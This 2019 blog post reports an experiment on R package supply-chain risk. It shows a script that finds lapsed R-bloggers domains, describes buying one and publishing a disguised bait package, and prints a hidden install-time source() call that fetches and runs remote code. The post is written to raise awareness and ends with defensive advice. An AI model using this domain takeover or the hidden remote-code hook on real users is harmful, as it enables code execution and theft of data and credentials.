R Packages: Are we too trusting?

Author: Colin Gillespie

Published: February 4, 2019

tags: r, security

One of the great things about R is the myriad of packages. Packages are typically installed via

  • CRAN
  • Bioconductor
  • GitHub
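
For reference, the three routes typically look like this (the package names below are placeholders, not real packages):

# Typical install commands for each source; names are placeholders
install.packages("somepackage")               # CRAN
BiocManager::install("somepackage")           # Bioconductor
devtools::install_github("user/somepackage")  # GitHub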

But how often do we think about what we are installing? Do we pay attention, or just install whenever something looks neat? Do we think about security, or just assume that everything is safe? In this post, we describe a slightly nefarious experiment designed to see whether people pay attention to what they install.

R-bloggers: The hook

R-bloggers is a great resource for keeping on top of what's happening in the world of R. It's one of the resources we recommend whenever we run training courses. For an author to get their site syndicated on R-bloggers, they have to email Tal, who checks that the site isn't spammy. I recently saw a tweet (I can't remember who from) that suggested, tongue in cheek, that to boost your website ranking you could just grab a domain that used to appear on R-bloggers.

This gave me an idea for something a bit more devious! Instead of boosting website traffic, could we grab a domain, create a dummy R package, then monitor who installs the package?

A list of contributing sites is nicely provided by R-bloggers. A quick and dirty script identifies potential target domains. First, we load a few packages:

library(httr)      # web requests
library(tidyverse) # data manipulation
library(rvest)     # HTML scraping

Then we extract all the URLs from the page:

page_source = "https://www.r-bloggers.com/blogs-list/" %>%
  read_html()
urls = page_source %>%
  html_nodes("a") %>%
  html_attr("href")

With a little helper function to get the status code,

# If a site is available, it should return 200
get_status_code = function(url) {
  status = try(GET(url)$status, silent = TRUE)
  if (inherits(status, "try-error"))
    status = NA
  status
}

we simply probe each URL:

# Lots of threads
status_codes = parallel::mclapply(urls, get_status_code, mc.cores = 24)
status_codes = unlist(status_codes)

In total, there were 43 URLs that did not return the required status code of 200:

tibble(urls = urls, status_codes = status_codes) %>%
   filter(!is.na(status_codes)) %>%
   filter(status_codes != 200) %>%
   head()
# A tibble: 6 x 2
  urls                                                     status_codes
  <chr>                                                           <int>
1 http://www.56n.dk                                                 406
2 http://bio7.org/                                                  403
3 http://www.seascapemodels.org/bluecology_blog/index.html          404
4 https://climateecology.wordpress.com                              410
5 http://www.compmath.com/blog                                      500
6 https://hamiltonblake.github.io                                   404

In the end, we went with vinux.in. According to the Wayback Machine, the site seems to have died around 2017. Claiming the domain cost £10 for the year.

By claiming this site, I automatically acquired a site with incoming traffic. One evil strategy would be simply to sit back and collect the traffic from R-bloggers.

{blogdown} & {ggplot2}: The bait

Next, I created a GitLab user rstatsgit and a blog via the excellent {blogdown} package. Now, clearly, we need something to entice people to run our code, so I created a very simple R package that scans {ggplot2} themes. Nothing fancy, only a dozen or so lines of code. In case anyone looked at the repository page, I copied a few badges from other packages to make it look more genuine. I used Netlify to link the new blog to our recently purchased domain. The resulting blog doesn't look too bad at all.

At the bottom of one of the .R files in the package, there is a simple source() command. This, in theory, could be used to do anything: grab data, passwords, ssh keys. Clearly, we don't do any of that. Instead, it simply pings a site to tell us that the package has been installed.
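
As a rough sketch of the mechanism (the URL below is a placeholder, not the one actually used), the trick relies on the fact that top-level code in a package's R/ files is evaluated when the package is installed:

# Hypothetical reconstruction of the hidden call. Top-level code in a
# package's R/ files runs at install time, so this single line executes
# on the installing user's machine. The remote script could contain
# anything; ours merely recorded that an installation happened.
source("https://vinux.in/run.R")  # placeholder URL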

R-bloggers & Twitter: Delivery

To deliver the content, I'm going for a combination of trying to get the post onto R-bloggers via the old site's RSS feed, and tweeting about the page with the #rstats hashtag.

Did people install the package?

I’ll update the blog post with results in a week or two.

Who is not to blame?

It’s instructive to think about who is not to blame:

  • GitLab/GitHub: it would be impossible for them to police the code that is uploaded to their sites.
  • {devtools} (install_git*()): There are many legitimate uses for these functions. Blaming them would be the equivalent of blaming StackOverflow for bad advice; it doesn't really make sense.
  • R-bloggers: It simply isn't feasible to thoroughly vet every post. In the past, the site has reacted quickly to anything spammy and removed offending articles. They also have no control over what happens to a domain once the original owner lets it go.
  • The person who owned the site: Nope. They owned the site. Now they don’t. They have no responsibility.

Who is to blame?

Well, I suppose I'm to blame, since I created the site and package ;) But more seriously, if you installed the package, you're to blame! I think everyone is guilty of copying and pasting code from blogs, StackOverflow and forums without always understanding what's going on. But the internet is a dangerous place, and most people who use R almost certainly have juicy data that shouldn't be released to the outside world.

By pure coincidence, I’ve noticed that Bob Rudis has started emphasising that we should be more responsible about what we install.

How to protect against this?

This is something we have been helping clients tackle over the last two years. Companies use R to run the latest algorithms and try cutting-edge visualisation methods, and they employ bright and enthusiastic data scientists who enjoy what they do. If companies make things too restrictive, people will either find a way around the restrictions or simply leave.

The crucial thing to remember is that if someone really wants to do something unsafe, we can't stop them. Instead, we need to provide safe alternatives that don't hinder work while at the same time reducing overall risk.

When dealing with companies, we help them tackle the problem in a number of ways:

  • Education! Both for the team and for team leaders!
  • Have an internal package repository. Either we build this, or we use RStudio's Package Manager (we're one of the few RStudio Certified Partners in the world).
  • We may disable tools such as install_github(); see the sketch after this list.
  • Reduce risk by having clearly separated testing and deployment machines.
  • Implement two-factor authentication.
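
As a rough sketch of the repository and install_github() points (one possible approach with a made-up repository URL, not our exact setup), a site-wide startup file can nudge users towards the vetted source:

# Sketch for R_HOME/etc/Rprofile.site; the repository URL is made up
local({
  # Point install.packages() at the internal, vetted repository only
  options(repos = c(internal = "https://cran.internal.example.com"))
})

# Crude deterrent: mask a bare install_github() call at the prompt.
# It is easily bypassed (e.g. via devtools::install_github()), which
# is why education matters more than any single technical control.
install_github = function(...) {
  stop("install_github() is disabled here; use the internal repository")
}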

All of the above can be circumvented by a determined data scientist. But the idea is that, with education, we can reduce the potential risk without impeding day-to-day work.

